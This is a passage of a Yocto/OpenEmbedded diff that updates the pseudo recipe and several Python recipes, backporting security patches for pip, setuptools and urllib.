3# Script to re-generate pseudo-prebuilt-2.33.tar.xz
4#
5# Copyright (C) 2021 Richard Purdie
6#
7# SPDX-License-Identifier: GPL-2.0-only
8#
9
10for i in x86_64 aarch64 i686; do
11 if [ ! -e $i-nativesdk-libc.tar.xz ]; then
12 wget http://downloads.yoctoproject.org/releases/uninative/3.2/$i-nativesdk-libc.tar.xz
13 fi
14 tar -xf $i-nativesdk-libc.tar.xz --wildcards \*/lib/libpthread\* \*/lib/libdl\*
15 cd $i-linux/lib
16 ln -s libdl.so.2 libdl.so
17 ln -s libpthread.so.0 libpthread.so
18 cd ../..
19done
20tar -cJf pseudo-prebuilt-2.33.tar.xz *-linux \ No newline at end of file
diff --git a/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
new file mode 100644
index 0000000000..c453b5f735
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
@@ -0,0 +1,57 @@
1If we link against a newer glibc 2.34 and then try and our LD_PRELOAD is run against a
2binary on a host with an older libc, we see symbol errors since in glibc 2.34, pthread
3and dl are merged into libc itself.
4
5We need to use the older form of linking so use glibc binaries from an older release
6to force this. We only use minimal symbols from these anyway.
7
8pthread_atfork is problematic, particularly on arm so use the internal glibc routine
9it maps too. This was always present in the main libc from 2.3.2 onwards.
10
11Yes this is horrible. Better solutions welcome.
12
13There is more info in the bug: [YOCTO #14521]
14
15Upstream-Status: Inappropriate [this patch is native and nativesdk]
16Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
17
18Tweak library search order, make prebuilt lib ahead of recipe lib
19Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
20---
21 Makefile.in | 2 +-
22 pseudo_wrappers.c | 5 ++++-
23 2 files changed, 5 insertions(+), 2 deletions(-)
24
25diff --git a/Makefile.in b/Makefile.in
26--- a/Makefile.in
27+++ b/Makefile.in
28@@ -120,7 +120,7 @@ $(PSEUDODB): pseudodb.o $(SHOBJS) $(DBOBJS) pseudo_ipc.o | $(BIN)
29 libpseudo: $(LIBPSEUDO)
30
31 $(LIBPSEUDO): $(WRAPOBJS) pseudo_client.o pseudo_ipc.o $(SHOBJS) | $(LIB)
32- $(CC) $(CFLAGS) $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
33+ $(CC) $(CFLAGS) -Lprebuilt/$(shell uname -m)-linux/lib/ $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
34 pseudo_client.o pseudo_ipc.o \
35 $(WRAPOBJS) $(SHOBJS) $(LDFLAGS) $(CLIENT_LDFLAGS)
36
37diff --git a/pseudo_wrappers.c b/pseudo_wrappers.c
38--- a/pseudo_wrappers.c
39+++ b/pseudo_wrappers.c
40@@ -100,10 +100,13 @@ static void libpseudo_atfork_child(void)
41 pseudo_mutex_holder = 0;
42 }
43
44+extern void *__dso_handle;
45+extern int __register_atfork (void (*) (void), void (*) (void), void (*) (void), void *);
46+
47 static void
48 _libpseudo_init(void) {
49 if (!_libpseudo_initted)
50- pthread_atfork(NULL, NULL, libpseudo_atfork_child);
51+ __register_atfork (NULL, NULL, libpseudo_atfork_child, &__dso_handle == NULL ? NULL : __dso_handle);
52
53 pseudo_getlock();
54 pseudo_antimagic();
55--
562.27.0
57
diff --git a/meta/recipes-devtools/pseudo/pseudo.inc b/meta/recipes-devtools/pseudo/pseudo.inc
index 50e30064bd..e6512bc6e6 100644
--- a/meta/recipes-devtools/pseudo/pseudo.inc
+++ b/meta/recipes-devtools/pseudo/pseudo.inc
@@ -4,6 +4,7 @@
4 4
5SUMMARY = "Pseudo gives fake root capabilities to a normal user" 5SUMMARY = "Pseudo gives fake root capabilities to a normal user"
6HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/pseudo" 6HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/pseudo"
7DESCRIPTION = "The pseudo utility offers a way to run commands in a virtualized root environment."
7LIC_FILES_CHKSUM = "file://COPYING;md5=a1d8023a6f953ac6ea4af765ff62d574" 8LIC_FILES_CHKSUM = "file://COPYING;md5=a1d8023a6f953ac6ea4af765ff62d574"
8SECTION = "base" 9SECTION = "base"
9LICENSE = "LGPL2.1" 10LICENSE = "LGPL2.1"
@@ -111,6 +112,19 @@ do_compile_prepend_class-nativesdk () {
111 fi 112 fi
112} 113}
113 114
115do_compile_append_class-native () {
116 if [ '${@bb.data.inherits_class('uninative', d)}' = 'True' ]; then
117 for i in PSEUDO_PORT_UNIX_SYNCFS PSEUDO_PORT_UIDS_GENERIC PSEUDO_PORT_LINUX_NEWCLONE PSEUDO_PORT_LINUX_XATTR PSEUDO_PORT_LINUX_STATVFS; do
118 grep $i.1 ${S}/pseudo_ports.h
119 if [ $? != 0 ]; then
120 echo "$i not enabled in pseudo which is incompatible with uninative"
121 exit 1
122 fi
123 done
124 fi
125}
126
127
114do_install () { 128do_install () {
115 oe_runmake 'DESTDIR=${D}' ${MAKEOPTS} 'LIB=lib/pseudo/lib$(MARK64)' install 129 oe_runmake 'DESTDIR=${D}' ${MAKEOPTS} 'LIB=lib/pseudo/lib$(MARK64)' install
116} 130}
diff --git a/meta/recipes-devtools/pseudo/pseudo_git.bb b/meta/recipes-devtools/pseudo/pseudo_git.bb
index 17bd02c27c..b5da3f0e29 100644
--- a/meta/recipes-devtools/pseudo/pseudo_git.bb
+++ b/meta/recipes-devtools/pseudo/pseudo_git.bb
@@ -5,8 +5,15 @@ SRC_URI = "git://git.yoctoproject.org/pseudo;branch=oe-core \
5 file://fallback-passwd \ 5 file://fallback-passwd \
6 file://fallback-group \ 6 file://fallback-group \
7 " 7 "
8SRC_URI:append:class-native = " \
9 http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
10 file://older-glibc-symbols.patch"
11SRC_URI:append:class-nativesdk = " \
12 http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
13 file://older-glibc-symbols.patch"
14SRC_URI[prebuilt.sha256sum] = "ed9f456856e9d86359f169f46a70ad7be4190d6040282b84c8d97b99072485aa"
8 15
9SRCREV = "60e25a36558f1f07dcce1a044fe976b475bec42b" 16SRCREV = "2b4b88eb513335b0ece55fe51854693d9b20de35"
10S = "${WORKDIR}/git" 17S = "${WORKDIR}/git"
11PV = "1.9.0+git${SRCPV}" 18PV = "1.9.0+git${SRCPV}"
12 19
diff --git a/meta/recipes-devtools/python-numpy/python-numpy.inc b/meta/recipes-devtools/python-numpy/python-numpy.inc
index 42032a04a8..4cc506474b 100644
--- a/meta/recipes-devtools/python-numpy/python-numpy.inc
+++ b/meta/recipes-devtools/python-numpy/python-numpy.inc
@@ -1,4 +1,6 @@
1SUMMARY = "A sophisticated Numeric Processing Package for Python" 1SUMMARY = "A sophisticated Numeric Processing Package for Python"
2HOMEPAGE = "https://numpy.org/"
3DESCRIPTION = "NumPy is the fundamental package needed for scientific computing with Python."
2SECTION = "devel/python" 4SECTION = "devel/python"
3LICENSE = "BSD-3-Clause & BSD-2-Clause & PSF & Apache-2.0 & BSD & MIT" 5LICENSE = "BSD-3-Clause & BSD-2-Clause & PSF & Apache-2.0 & BSD & MIT"
4LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=1a32aba007a415aa8a1c708a0e2b86a1" 6LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=1a32aba007a415aa8a1c708a0e2b86a1"
diff --git a/meta/recipes-devtools/python/python-setuptools.inc b/meta/recipes-devtools/python/python-setuptools.inc
index 29be852f66..5faf62bc3a 100644
--- a/meta/recipes-devtools/python/python-setuptools.inc
+++ b/meta/recipes-devtools/python/python-setuptools.inc
@@ -8,6 +8,8 @@ PYPI_PACKAGE_EXT = "zip"
8 8
9inherit pypi 9inherit pypi
10 10
11SRC_URI += " file://CVE-2022-40897.patch "
12
11SRC_URI_append_class-native = " file://0001-conditionally-do-not-fetch-code-by-easy_install.patch" 13SRC_URI_append_class-native = " file://0001-conditionally-do-not-fetch-code-by-easy_install.patch"
12 14
13SRC_URI[md5sum] = "0c956eea142af9c2b02d72e3c042af30" 15SRC_URI[md5sum] = "0c956eea142af9c2b02d72e3c042af30"
diff --git a/meta/recipes-devtools/python/python3-jinja2_2.11.2.bb b/meta/recipes-devtools/python/python3-jinja2_2.11.3.bb
index 89538d2f27..9f054c6024 100644
--- a/meta/recipes-devtools/python/python3-jinja2_2.11.2.bb
+++ b/meta/recipes-devtools/python/python3-jinja2_2.11.3.bb
@@ -1,12 +1,15 @@
1DESCRIPTION = "Python Jinja2: A small but fast and easy to use stand-alone template engine written in pure python." 1DESCRIPTION = "Python Jinja2: A small but fast and easy to use stand-alone template engine written in pure python."
2HOMEPAGE = "https://pypi.org/project/Jinja2/"
2 3
3LICENSE = "BSD-3-Clause" 4LICENSE = "BSD-3-Clause"
4LIC_FILES_CHKSUM = "file://LICENSE.rst;md5=5dc88300786f1c214c1e9827a5229462" 5LIC_FILES_CHKSUM = "file://LICENSE.rst;md5=5dc88300786f1c214c1e9827a5229462"
5 6
6SRC_URI[sha256sum] = "89aab215427ef59c34ad58735269eb58b1a5808103067f7bb9d5836c651b3bb0" 7SRC_URI[sha256sum] = "a6d58433de0ae800347cab1fa3043cebbabe8baa9d29e668f1c768cb87a333c6"
7 8
8PYPI_PACKAGE = "Jinja2" 9PYPI_PACKAGE = "Jinja2"
9 10
11CVE_PRODUCT = "jinja2 jinja"
12
10CLEANBROKEN = "1" 13CLEANBROKEN = "1"
11 14
12inherit pypi setuptools3 15inherit pypi setuptools3
diff --git a/meta/recipes-devtools/python/python3-magic_0.4.15.bb b/meta/recipes-devtools/python/python3-magic_0.4.15.bb
index 698016ba4c..b73310c808 100644
--- a/meta/recipes-devtools/python/python3-magic_0.4.15.bb
+++ b/meta/recipes-devtools/python/python3-magic_0.4.15.bb
@@ -14,6 +14,11 @@ inherit pypi setuptools3
14SRC_URI[md5sum] = "e384c95a47218f66c6501cd6dd45ff59" 14SRC_URI[md5sum] = "e384c95a47218f66c6501cd6dd45ff59"
15SRC_URI[sha256sum] = "f3765c0f582d2dfc72c15f3b5a82aecfae9498bd29ca840d72f37d7bd38bfcd5" 15SRC_URI[sha256sum] = "f3765c0f582d2dfc72c15f3b5a82aecfae9498bd29ca840d72f37d7bd38bfcd5"
16 16
17RDEPENDS_${PN} += "file" 17DEPENDS_append_class-native = " file-replacement-native"
18
19RDEPENDS_${PN} += "file \
20 ${PYTHON_PN}-ctypes \
21 ${PYTHON_PN}-io \
22 ${PYTHON_PN}-shell"
18 23
19BBCLASSEXTEND = "native" 24BBCLASSEXTEND = "native"
diff --git a/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch b/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch
new file mode 100644
index 0000000000..a38ab57bc6
--- /dev/null
+++ b/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch
@@ -0,0 +1,48 @@
1From c4fd13410b9a219f77fc30775d4a0ac9f69725bd Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 16 Jun 2022 09:52:43 +0530
4Subject: [PATCH] CVE-2021-3572
5
6Upstream-Status: Backport [https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b]
7CVE: CVE-2021-3572
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 news/9827.bugfix.rst | 3 +++
11 src/pip/_internal/vcs/git.py | 10 ++++++++--
12 2 files changed, 11 insertions(+), 2 deletions(-)
13 create mode 100644 news/9827.bugfix.rst
14
15diff --git a/news/9827.bugfix.rst b/news/9827.bugfix.rst
16new file mode 100644
17index 0000000..e0d27c3
18--- /dev/null
19+++ b/news/9827.bugfix.rst
20@@ -0,0 +1,3 @@
21+**SECURITY**: Stop splitting on unicode separators in git references,
22+which could be maliciously used to install a different revision on the
23+repository.
24diff --git a/src/pip/_internal/vcs/git.py b/src/pip/_internal/vcs/git.py
25index 7483303..1b895f6 100644
26--- a/src/pip/_internal/vcs/git.py
27+++ b/src/pip/_internal/vcs/git.py
28@@ -137,9 +137,15 @@ class Git(VersionControl):
29 output = cls.run_command(['show-ref', rev], cwd=dest,
30 show_stdout=False, on_returncode='ignore')
31 refs = {}
32- for line in output.strip().splitlines():
33+ # NOTE: We do not use splitlines here since that would split on other
34+ # unicode separators, which can be maliciously used to install a
35+ # different revision.
36+ for line in output.strip().split("\n"):
37+ line = line.rstrip("\r")
38+ if not line:
39+ continue
40 try:
41- sha, ref = line.split()
42+ ref_sha, ref_name = line.split(" ", maxsplit=2)
43 except ValueError:
44 # Include the offending line to simplify troubleshooting if
45 # this error ever occurs.
46--
472.25.1
48
diff --git a/meta/recipes-devtools/python/python3-pip_20.0.2.bb b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
index 08738fb2f9..e24c6f4477 100644
--- a/meta/recipes-devtools/python/python3-pip_20.0.2.bb
+++ b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
@@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=8ba06d529c955048e5ddd7c45459eb2e"
6 6
7DEPENDS += "python3 python3-setuptools-native" 7DEPENDS += "python3 python3-setuptools-native"
8 8
9SRC_URI = "file://CVE-2021-3572.patch "
9SRC_URI[md5sum] = "7d42ba49b809604f0df3d55df1c3fd86" 10SRC_URI[md5sum] = "7d42ba49b809604f0df3d55df1c3fd86"
10SRC_URI[sha256sum] = "7db0c8ea4c7ea51c8049640e8e6e7fde949de672bfa4949920675563a5a6967f" 11SRC_URI[sha256sum] = "7db0c8ea4c7ea51c8049640e8e6e7fde949de672bfa4949920675563a5a6967f"
11 12
diff --git a/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb b/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
index 6babf0cae8..29825492b9 100644
--- a/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
+++ b/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Python GObject bindings" 1SUMMARY = "Python GObject bindings"
2HOMEPAGE = "https://gitlab.gnome.org/GNOME/pygobject"
3DESCRIPTION = "PyGObject is a Python package which provides bindings for GObject based libraries such as GTK, GStreamer, WebKitGTK, GLib, GIO and many more."
2SECTION = "devel/python" 4SECTION = "devel/python"
3LICENSE = "LGPLv2.1" 5LICENSE = "LGPLv2.1"
4LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7" 6LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"
diff --git a/meta/recipes-devtools/python/python3-scons_3.1.2.bb b/meta/recipes-devtools/python/python3-scons_3.1.2.bb
index ce117a92d4..12122131a5 100644
--- a/meta/recipes-devtools/python/python3-scons_3.1.2.bb
+++ b/meta/recipes-devtools/python/python3-scons_3.1.2.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Software Construction tool (make/autotools replacement)" 1SUMMARY = "Software Construction tool (make/autotools replacement)"
2HOMEPAGE = "https://github.com/SCons/scons"
2SECTION = "devel/python" 3SECTION = "devel/python"
3LICENSE = "MIT" 4LICENSE = "MIT"
4LIC_FILES_CHKSUM = "file://${WORKDIR}/LICENSE-python3-scons-${PV};md5=e14e1b33428df24a40a782ae142785d0" 5LIC_FILES_CHKSUM = "file://${WORKDIR}/LICENSE-python3-scons-${PV};md5=e14e1b33428df24a40a782ae142785d0"
diff --git a/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch b/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch
new file mode 100644
index 0000000000..9150cea07e
--- /dev/null
+++ b/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch
@@ -0,0 +1,29 @@
1From 43a9c9bfa6aa626ec2a22540bea28d2ca77964be Mon Sep 17 00:00:00 2001
2From: "Jason R. Coombs" <jaraco@jaraco.com>
3Date: Fri, 4 Nov 2022 13:47:53 -0400
4Subject: [PATCH] Limit the amount of whitespace to search/backtrack. Fixes
5 #3659.
6
7CVE: CVE-2022-40897
8Upstream-Status: Backport [
9Upstream : https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be
10Import from Ubuntu: http://archive.ubuntu.com/ubuntu/pool/main/s/setuptools/setuptools_45.2.0-1ubuntu0.1.debian.tar.xz
11]
12Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
13
14---
15 setuptools/package_index.py | 2 +-
16 setuptools/tests/test_packageindex.py | 1 -
17 2 files changed, 1 insertion(+), 2 deletions(-)
18
19--- setuptools-45.2.0.orig/setuptools/package_index.py
20+++ setuptools-45.2.0/setuptools/package_index.py
21@@ -215,7 +215,7 @@ def unique_values(func):
22 return wrapper
23
24
25-REL = re.compile(r"""<([^>]*\srel\s*=\s*['"]?([^'">]+)[^>]*)>""", re.I)
26+REL = re.compile(r"""<([^>]*\srel\s{0,10}=\s{0,10}['"]?([^'" >]+)[^>]*)>""", re.I)
27 # this line is here to fix emacs' cruddy broken syntax highlighting
28
29
diff --git a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
index c4fae09a5b..4ac0e140cc 100644
--- a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
+++ b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
@@ -14,17 +14,21 @@ Upstream-Status: Submitted [https://github.com/python/cpython/pull/13196]
14Signed-off-by: Matthias Schoepfer <matthias.schoepfer@ithinx.io> 14Signed-off-by: Matthias Schoepfer <matthias.schoepfer@ithinx.io>
15 15
16%% original patch: 0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch 16%% original patch: 0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
17
18Updated to apply after dea270a2a80214de22afadaaca2043d0d782eb7d
19
20Signed-off-by: Tim Orling <tim.orling@konsulko.com>
17--- 21---
18 configure.ac | 175 +++++++-------------------------------------------- 22 configure.ac | 175 +++++++--------------------------------------------
19 1 file changed, 21 insertions(+), 154 deletions(-) 23 1 file changed, 21 insertions(+), 154 deletions(-)
20 24
21diff --git a/configure.ac b/configure.ac 25diff --git a/configure.ac b/configure.ac
22index ede710e..bc81b0b 100644 26index de83332dd3..16b02d0798 100644
23--- a/configure.ac 27--- a/configure.ac
24+++ b/configure.ac 28+++ b/configure.ac
25@@ -710,160 +710,27 @@ fi 29@@ -719,160 +719,27 @@ then
26 MULTIARCH=$($CC --print-multiarch 2>/dev/null) 30 fi
27 AC_SUBST(MULTIARCH) 31
28 32
29-AC_MSG_CHECKING([for the platform triplet based on compiler characteristics]) 33-AC_MSG_CHECKING([for the platform triplet based on compiler characteristics])
30-cat >> conftest.c <<EOF 34-cat >> conftest.c <<EOF
@@ -185,25 +189,25 @@ index ede710e..bc81b0b 100644
185+## Need to handle macos, vxworks and hurd special (?) :-/ 189+## Need to handle macos, vxworks and hurd special (?) :-/
186+case ${target_os} in 190+case ${target_os} in
187+ darwin*) 191+ darwin*)
188+ PLATFORM_TRIPLET=darwin 192+ PLATFORM_TRIPLET=darwin
189+ ;; 193+ ;;
190+ hurd*) 194+ hurd*)
191+ PLATFORM_TRIPLET=i386-gnu 195+ PLATFORM_TRIPLET=i386-gnu
192+ ;; 196+ ;;
193+ vxworks*) 197+ vxworks*)
194+ PLATFORM_TRIPLET=vxworks 198+ PLATFORM_TRIPLET=vxworks
195+ ;; 199+ ;;
196+ *) 200+ *)
197+ if test "${target_cpu}" != "i686"; then 201+ if test "${target_cpu}" != "i686"; then
198+ PLATFORM_TRIPLET=${target_cpu}-${target_os} 202+ PLATFORM_TRIPLET=${target_cpu}-${target_os}
199+ else 203+ else
200+ PLATFORM_TRIPLET=i386-${target_os} 204+ PLATFORM_TRIPLET=i386-${target_os}
201+ fi 205+ fi
202+ ;; 206+ ;;
203+esac 207+esac
204 208
205 if test x$PLATFORM_TRIPLET != x && test x$MULTIARCH != x; then 209 if test x$PLATFORM_TRIPLET != xdarwin; then
206 if test x$PLATFORM_TRIPLET != x$MULTIARCH; then 210 MULTIARCH=$($CC --print-multiarch 2>/dev/null)
207-- 211--
2082.24.1 2122.32.0
209 213
diff --git a/meta/recipes-devtools/python/python3/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch b/meta/recipes-devtools/python/python3/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
deleted file mode 100644
index e16b99bcb9..0000000000
--- a/meta/recipes-devtools/python/python3/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
+++ /dev/null
@@ -1,248 +0,0 @@
1From 0b297d4ff1c0e4480ad33acae793fbaf4bf015b4 Mon Sep 17 00:00:00 2001
2From: Victor Stinner <vstinner@python.org>
3Date: Thu, 2 Apr 2020 02:52:20 +0200
4Subject: [PATCH] bpo-39503: CVE-2020-8492: Fix AbstractBasicAuthHandler
5 (GH-18284)
6
7Upstream-Status: Backport
8(https://github.com/python/cpython/commit/0b297d4ff1c0e4480ad33acae793fbaf4bf015b4)
9
10CVE: CVE-2020-8492
11
12The AbstractBasicAuthHandler class of the urllib.request module uses
13an inefficient regular expression which can be exploited by an
14attacker to cause a denial of service. Fix the regex to prevent the
15catastrophic backtracking. Vulnerability reported by Ben Caller
16and Matt Schwager.
17
18AbstractBasicAuthHandler of urllib.request now parses all
19WWW-Authenticate HTTP headers and accepts multiple challenges per
20header: use the realm of the first Basic challenge.
21
22Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
23Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
24---
25 Lib/test/test_urllib2.py | 90 ++++++++++++-------
26 Lib/urllib/request.py | 69 ++++++++++----
27 .../2020-03-25-16-02-16.bpo-39503.YmMbYn.rst | 3 +
28 .../2020-01-30-16-15-29.bpo-39503.B299Yq.rst | 5 ++
29 4 files changed, 115 insertions(+), 52 deletions(-)
30 create mode 100644 Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
31 create mode 100644 Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
32
33diff --git a/Lib/test/test_urllib2.py b/Lib/test/test_urllib2.py
34index 8abedaac98..e69ac3e213 100644
35--- a/Lib/test/test_urllib2.py
36+++ b/Lib/test/test_urllib2.py
37@@ -1446,40 +1446,64 @@ class HandlerTests(unittest.TestCase):
38 bypass = {'exclude_simple': True, 'exceptions': []}
39 self.assertTrue(_proxy_bypass_macosx_sysconf('test', bypass))
40
41- def test_basic_auth(self, quote_char='"'):
42- opener = OpenerDirector()
43- password_manager = MockPasswordManager()
44- auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
45- realm = "ACME Widget Store"
46- http_handler = MockHTTPHandler(
47- 401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
48- (quote_char, realm, quote_char))
49- opener.add_handler(auth_handler)
50- opener.add_handler(http_handler)
51- self._test_basic_auth(opener, auth_handler, "Authorization",
52- realm, http_handler, password_manager,
53- "http://acme.example.com/protected",
54- "http://acme.example.com/protected",
55- )
56-
57- def test_basic_auth_with_single_quoted_realm(self):
58- self.test_basic_auth(quote_char="'")
59-
60- def test_basic_auth_with_unquoted_realm(self):
61- opener = OpenerDirector()
62- password_manager = MockPasswordManager()
63- auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
64- realm = "ACME Widget Store"
65- http_handler = MockHTTPHandler(
66- 401, 'WWW-Authenticate: Basic realm=%s\r\n\r\n' % realm)
67- opener.add_handler(auth_handler)
68- opener.add_handler(http_handler)
69- with self.assertWarns(UserWarning):
70+ def check_basic_auth(self, headers, realm):
71+ with self.subTest(realm=realm, headers=headers):
72+ opener = OpenerDirector()
73+ password_manager = MockPasswordManager()
74+ auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
75+ body = '\r\n'.join(headers) + '\r\n\r\n'
76+ http_handler = MockHTTPHandler(401, body)
77+ opener.add_handler(auth_handler)
78+ opener.add_handler(http_handler)
79 self._test_basic_auth(opener, auth_handler, "Authorization",
80- realm, http_handler, password_manager,
81- "http://acme.example.com/protected",
82- "http://acme.example.com/protected",
83- )
84+ realm, http_handler, password_manager,
85+ "http://acme.example.com/protected",
86+ "http://acme.example.com/protected")
87+
88+ def test_basic_auth(self):
89+ realm = "realm2@example.com"
90+ realm2 = "realm2@example.com"
91+ basic = f'Basic realm="{realm}"'
92+ basic2 = f'Basic realm="{realm2}"'
93+ other_no_realm = 'Otherscheme xxx'
94+ digest = (f'Digest realm="{realm2}", '
95+ f'qop="auth, auth-int", '
96+ f'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", '
97+ f'opaque="5ccc069c403ebaf9f0171e9517f40e41"')
98+ for realm_str in (
99+ # test "quote" and 'quote'
100+ f'Basic realm="{realm}"',
101+ f"Basic realm='{realm}'",
102+
103+ # charset is ignored
104+ f'Basic realm="{realm}", charset="UTF-8"',
105+
106+ # Multiple challenges per header
107+ f'{basic}, {basic2}',
108+ f'{basic}, {other_no_realm}',
109+ f'{other_no_realm}, {basic}',
110+ f'{basic}, {digest}',
111+ f'{digest}, {basic}',
112+ ):
113+ headers = [f'WWW-Authenticate: {realm_str}']
114+ self.check_basic_auth(headers, realm)
115+
116+ # no quote: expect a warning
117+ with support.check_warnings(("Basic Auth Realm was unquoted",
118+ UserWarning)):
119+ headers = [f'WWW-Authenticate: Basic realm={realm}']
120+ self.check_basic_auth(headers, realm)
121+
122+ # Multiple headers: one challenge per header.
123+ # Use the first Basic realm.
124+ for challenges in (
125+ [basic, basic2],
126+ [basic, digest],
127+ [digest, basic],
128+ ):
129+ headers = [f'WWW-Authenticate: {challenge}'
130+ for challenge in challenges]
131+ self.check_basic_auth(headers, realm)
132
133 def test_proxy_basic_auth(self):
134 opener = OpenerDirector()
135diff --git a/Lib/urllib/request.py b/Lib/urllib/request.py
136index 7fe50535da..2a3d71554f 100644
137--- a/Lib/urllib/request.py
138+++ b/Lib/urllib/request.py
139@@ -937,8 +937,15 @@ class AbstractBasicAuthHandler:
140
141 # allow for double- and single-quoted realm values
142 # (single quotes are a violation of the RFC, but appear in the wild)
143- rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+'
144- 'realm=(["\']?)([^"\']*)\\2', re.I)
145+ rx = re.compile('(?:^|,)' # start of the string or ','
146+ '[ \t]*' # optional whitespaces
147+ '([^ \t]+)' # scheme like "Basic"
148+ '[ \t]+' # mandatory whitespaces
149+ # realm=xxx
150+ # realm='xxx'
151+ # realm="xxx"
152+ 'realm=(["\']?)([^"\']*)\\2',
153+ re.I)
154
155 # XXX could pre-emptively send auth info already accepted (RFC 2617,
156 # end of section 2, and section 1.2 immediately after "credentials"
157@@ -950,27 +957,51 @@ class AbstractBasicAuthHandler:
158 self.passwd = password_mgr
159 self.add_password = self.passwd.add_password
160
161+ def _parse_realm(self, header):
162+ # parse WWW-Authenticate header: accept multiple challenges per header
163+ found_challenge = False
164+ for mo in AbstractBasicAuthHandler.rx.finditer(header):
165+ scheme, quote, realm = mo.groups()
166+ if quote not in ['"', "'"]:
167+ warnings.warn("Basic Auth Realm was unquoted",
168+ UserWarning, 3)
169+
170+ yield (scheme, realm)
171+
172+ found_challenge = True
173+
174+ if not found_challenge:
175+ if header:
176+ scheme = header.split()[0]
177+ else:
178+ scheme = ''
179+ yield (scheme, None)
180+
181 def http_error_auth_reqed(self, authreq, host, req, headers):
182 # host may be an authority (without userinfo) or a URL with an
183 # authority
184- # XXX could be multiple headers
185- authreq = headers.get(authreq, None)
186+ headers = headers.get_all(authreq)
187+ if not headers:
188+ # no header found
189+ return
190
191- if authreq:
192- scheme = authreq.split()[0]
193- if scheme.lower() != 'basic':
194- raise ValueError("AbstractBasicAuthHandler does not"
195- " support the following scheme: '%s'" %
196- scheme)
197- else:
198- mo = AbstractBasicAuthHandler.rx.search(authreq)
199- if mo:
200- scheme, quote, realm = mo.groups()
201- if quote not in ['"',"'"]:
202- warnings.warn("Basic Auth Realm was unquoted",
203- UserWarning, 2)
204- if scheme.lower() == 'basic':
205- return self.retry_http_basic_auth(host, req, realm)
206+ unsupported = None
207+ for header in headers:
208+ for scheme, realm in self._parse_realm(header):
209+ if scheme.lower() != 'basic':
210+ unsupported = scheme
211+ continue
212+
213+ if realm is not None:
214+ # Use the first matching Basic challenge.
215+ # Ignore following challenges even if they use the Basic
216+ # scheme.
217+ return self.retry_http_basic_auth(host, req, realm)
218+
219+ if unsupported is not None:
220+ raise ValueError("AbstractBasicAuthHandler does not "
221+ "support the following scheme: %r"
222+ % (scheme,))
223
224 def retry_http_basic_auth(self, host, req, realm):
225 user, pw = self.passwd.find_user_password(realm, host)
226diff --git a/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
227new file mode 100644
228index 0000000000..be80ce79d9
229--- /dev/null
230+++ b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
231@@ -0,0 +1,3 @@
232+:class:`~urllib.request.AbstractBasicAuthHandler` of :mod:`urllib.request`
233+now parses all WWW-Authenticate HTTP headers and accepts multiple challenges
234+per header: use the realm of the first Basic challenge.
